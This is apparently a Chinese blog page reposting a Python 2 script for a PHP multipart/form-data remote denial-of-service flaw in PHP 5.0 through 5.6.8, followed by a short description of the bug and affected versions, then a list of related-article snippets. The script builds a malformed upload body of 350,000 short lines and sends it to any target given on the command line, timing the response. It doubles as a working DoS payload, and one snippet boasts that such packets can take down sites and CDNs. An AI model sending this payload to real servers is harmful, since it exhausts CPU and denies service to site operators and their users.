php 5.6 payload 出错,PHP multipart/form-data 远程DOS漏洞

最新推荐文章于 2023-07-03 07:45:00 发布
最新推荐文章于 2023-07-03 07:45:00 发布
阅读量220 收藏
点赞数
文章标签: php 5.6 payload 出错

import sys

import urllib,urllib2

import datetime

from optparse import OptionParser

def http_proxy(proxy_url):

proxy_handler = urllib2.ProxyHandler({"http" : proxy_url})

null_proxy_handler = urllib2.ProxyHandler({})

opener = urllib2.build_opener(proxy_handler)

urllib2.install_opener(opener)

#end http_proxy

def check_php_multipartform_dos(url,post_body,headers):

req = urllib2.Request(url)

for key in headers.keys():

req.add_header(key,headers[key])

starttime = datetime.datetime.now();

fd = urllib2.urlopen(req,post_body)

html = fd.read()

endtime = datetime.datetime.now()

usetime=(endtime - starttime).seconds

if(usetime > 5):

result = url+" is vulnerable";

else:

if(usetime > 3):

result = "need to check normal respond time"

return [result,usetime]

#end

def main():

#http_proxy("http://127.0.0.1:8089")

parser = OptionParser()

parser.add_option("-t", "--target", action="store",

dest="target",

default=False,

type="string",

help="test target")

(options, args) = parser.parse_args()

if(options.target):

target = options.target

else:

return;

Num=350000

headers={'Content-Type':'multipart/form-data; boundary=----WebKitFormBoundaryX3B7rDMPcQlzmJE1',

'Accept-Encoding':'gzip, deflate',

'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64)

AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36'}

body =

"------WebKitFormBoundaryX3B7rDMPcQlzmJE1\nContent-Disposition:

form-data; name=\"file\"; filename=sp.jpg"

payload=""

for i in range(0,Num):

payload = payload + "a\n"

body = body + payload;

body = body +

"Content-Type: application/octet-stream\r\n\r\ndatadata\r\n------

WebKitFormBoundaryX3B7rDMPcQlzmJE1--"

print "starting...";

respond=check_php_multipartform_dos(target,body,headers)

print "Result : "

print respond[0]

print "Respond time : "+str(respond[1]) + " seconds";

if __name__=="__main__":

main()

PHP 在处理HTTP请求中的multipart/form-data头部数据时存在一个安全漏洞,导致PHP大量重复分配和拷贝内存的操作,可能造成CPU资源占用100%并持续较长时间,这可能造成远程拒绝服务攻击。受影响的软件及系统:PHP 5.0.0 - 5.0.5;PHP 5.1.0 - 5.1.6;PHP 5.2.0 - 5.2.17;PHP 5.3.0 - 5.3.29;PHP 5.4.0 - 5.4.40;PHP 5.5.0 - 5.5.24;PHP 5.6.0 - 5.6.8

skpaddy
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Servlet获取AJAX POST请求中参数以form data和request payload形式传输的方法
08-28
本篇文章主要探讨如何在Servlet中处理AJAX POST请求,特别是当请求参数以`form data`和`request payload`两种不同形式传递时。 首先,理解HTTP请求的基本结构。GET请求的参数通常附加在URL后面,而POST请求的参数...
Cgi-bin 30个漏洞+使用方法.txt
07-18
### Cgi-bin 30个漏洞及使用方法详解 #### 一、概述 在Web开发领域,特别是基于Perl语言的动态网页开发中,CGI(Common Gateway Interface)扮演着重要的角色。然而,随着互联网技术的发展,CGI也逐渐暴露出一系列...
form-data php,PHP中以multipart/form-data上传文件流
weixin_36413546的博客
03-09 864
class UploadPart{protected static $url;protected static $delimiter;protected static $instance;public function __construct() {static::$url = ‘http://files.note.so/v1/file_server‘;static::$delimiter = u...
form-data php,phpMultipart/form-data漏洞补丁
weixin_33214011的博客
03-09 254
今天在乌云上看到PHP multipart/form-data 远程DOS漏洞,马上给同事联系了下对线上服务器进行打补丁,先给一个centos编译安装nginx+php-fpm+mysql的教程,如果是根据我这样安装的话,那你们可以继续按照做下去了,如果不是的话,那么你们就看看吧.系统:centos 5.x(64位)需要的软件:php-5.2-multipart-form-data.patch1....
重大漏洞PHP multipart/form-data头部解析远程拒绝服务漏洞
weixin_30488085的博客
01-23 186
"有些人看不懂,简单比喻来说吧:目前刚出的任何安全防护都不会拦,网站类专属漏洞 畸形数据包,2KB随机数据包,2M网速打死各种网站,cdn通挂!"PHP multipart/form-data头部解析远程拒绝服务漏洞发布日期:2015-05-18受影响的软件及系统:====================PHP 5.0.0 - 5.0.5PHP 5.1.0 - 5.1.6PHP 5...
提交设置为enctype="multipart/form-data"的表单时中文乱码解决
热门推荐
12-30 1万+
当页面表单设置为enctype="multipart/form-data"时,提交数据为中文的时候是乱码的 查看提交的数据: name       陈文杰 sex    男 解决: 因为表单设置为enctype="multipart/form-data"时就是在发送到服务器之前,所有字符都会进行编码(空格转换为 "+" 加
【修复】PHP multipart/form-data头部解析远程拒绝服务漏洞
weixin_33851177的博客
05-21 155
PHP multipart/form-data头部解析远程拒绝服务漏洞受影响的软件及系统:====================PHP 5.0.0 - 5.0.5PHP 5.1.0 - 5.1.6PHP 5.2.0 - 5.2.17PHP 5.3.0 - 5.3.29PHP 5.4.0 - 5.4.40PHP 5.5.0 - 5.5.24PHP 5.6.0 - 5.6.8未...
Python爬虫:Request Payload和Form Data的简单区别说明
09-16
在Python爬虫开发中,了解网络请求的细节至关重要,尤其是HTTP请求中的`Request Payload`和`Form Data`。这两者都是用于向服务器提交数据的方式,但它们之间存在一些关键的区别。 首先,`Form Data`是当我们在HTML...
PHP序列化/对象注入漏洞分析
10-22
PHP序列化/对象注入漏洞是一种安全风险,它发生在应用程序接收并反序列化用户提供的数据时。当不正确地处理反序列化过程时,攻击者可能能够构造恶意输入,导致代码执行、信息泄露或其他严重后果。在PHP中,序列化是...
Kafkaphp使用纯粹的PHP编写的kafka客户端
08-07
echo "Received message: {$msg->payload}\n"; } ``` 4. **关键特性** - **异步发送**:Kafka-php支持异步发送消息,提高性能。 - **错误处理**:提供了丰富的错误码和异常处理机制,便于调试和问题定位。 - ...
PHP multipart/form-data 远程DOS漏洞
文山
03-29 2430
转载:http://drops.wooyun.org/papers/6077 0x04 利用 构造像以下恶意的http请求,当存在350000行a\n时,在我的测试环境中,一个http请求将消耗10s的cpu时间。每隔若干秒,同时并发多个请求,将导致server端cpu资源长期耗尽,从而到达DOS。总的来说,利用方式和Hash Collision DOS一样。 -
jsp中使用multipart/form-data类型的form提交乱码问题
jhacker7的专栏
03-26 484
项目时发现以前是application/x-www-form-urlencoded的FORM提交数据时正常,  现在为表单添加个上传功能就有乱码了, 在网上看了篇文章 This problem had been bugging me for 3 days! Background: Use JSP and Servlet to implement file upload。The uploaded f...
php处理中文文件名,php上传中文文件名乱码问题处理方案,_PHP教程
weixin_35765226的博客
03-21 260
php上传中文文件名乱码问题处理方案,php上传文件是最最基础的一个技术点,但是深入进去也有不少问题需要解决,这不,上传中文文件后,文件名变成了乱码。下面是问题代码,很简单:1.问题代码html部分:复制代码 代码如下:enctype="multipart/form-data">Filename:php部分:复制代码 代码如下:if ($_FILES["file"]["error"] &gt...
php图片上传为空,php-multipart/form-data上传图片 解析为空
weixin_36251174的博客
03-11 137
如题 提交格式如下Content-type: multipart/form-data, boundary=aaaaa--aaaaacontent-disposition: form-data; name="name"aaaa--aaaaacontent-disposition: form-data; name="image"; filename="image.png"Content-Type: i...
php服务器端怎么获得multipart/form-data post的数据 Heanders中的 Formdata数据
tenggeer0789的博客
06-17 3711
file_put_contents('test.txt', print_r($_POST, 1)); 看看 test.txt 中有什么 直接写到 txt中 print_r($_POST) 就是携带的数据
enctype="multipart/form-data" php,form表单中enctype="multipart/form-data"问题????
weixin_36313344的博客
03-22 93
该楼层疑似违规已被系统折叠隐藏此楼查看此楼哟 SmartUpLoad 中国人写的上传下载的一个模板。SmartUpload smartUpload=new SmartUpload();//Common//paraseRequest();ServletConfig config=this.getServletConfig();smartUpload.initialize(config, reque...
php form post urlencode,php curl POST multipart/form-data与application/x-www-form-urlencode的区别...
weixin_42310231的博客
03-17 317
背景CURL在 a.php 中以 POST方式向 b.php 提交数据,但b.php无法接收到数据,而 CURL 操作显示成功。原来,"传递一个数组到CURLOPT_POSTFIELDS,CURL会把数据编码成 multipart/form-data,而传递一个URL-encoded字符串时,数据会被编码成 application/x-www-form-urlencoded"。但是在使用PHP ...
表单(form) post 方式提交时的字符集编码与乱码(下)--multipart/form-data 类型
Just do IT
07-03 3741
探讨了表单以 post 方式, enctype 为 multipart/form-data 提交时数据所使用的字符集编码(包含缺省使用页面编码及设置了 accept-charset 时两种情形), 包括了上传文件及使用中文文件名时的情况, 以及后台的接收处理.
php漏洞集合
weixin_50683638的博客
10-11 2269
第三章 常见的php漏洞集合 1.sql注入漏洞 0x01 注入介绍 1.什么是sql注入 用户输入的参数被当成sql语句在数据库里执行,这就是sql注入漏洞 2.sql注入的危害 sql注入轻则获取数据库信息,重则获取服务器权限。 0x02 搭建sqli-labs靶机 0.介绍 SQLI-LABS是学习SQLI的平台 sqli-labs下载链接:https://github.com/Audi-1/sqli-labs 环境:phpstudy+windows10 1.创建网站(注意php版本选择5.6) 2
json转multipart/form-data
最新发布
10-13
将 JSON 转换为 multipart/form-data 格式需要进行以下步骤: 1. 将 JSON 对象转换为 key-value 形式的数据; 2. 生成一个 boundary 字符串; 3. 按照 multipart/form-data 格式的要求,将数据和 boundary 进行拼接; 4. 将拼接后的数据发送到服务器。 以下是 Python 代码示例: ```python import json import requests def json_to_multipart_formdata(json_data): # 将 JSON 对象转换为 key-value 形式的数据 data = {} for key, value in json_data.items(): data[key] = str(value) # 生成一个 boundary 字符串 boundary = '----WebKitFormBoundary7MA4YWxkTrZu0gW' # 拼接数据和 boundary payload = '' for key, value in data.items(): payload += '--' + boundary + '\r\n' payload += 'Content-Disposition: form-data; name="' + key + '"\r\n\r\n' payload += value + '\r\n' payload += '--' + boundary + '--' # 发送请求 headers = {'Content-Type': 'multipart/form-data; boundary=' + boundary} response = requests.post(url, headers=headers, data=payload) return response.text ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值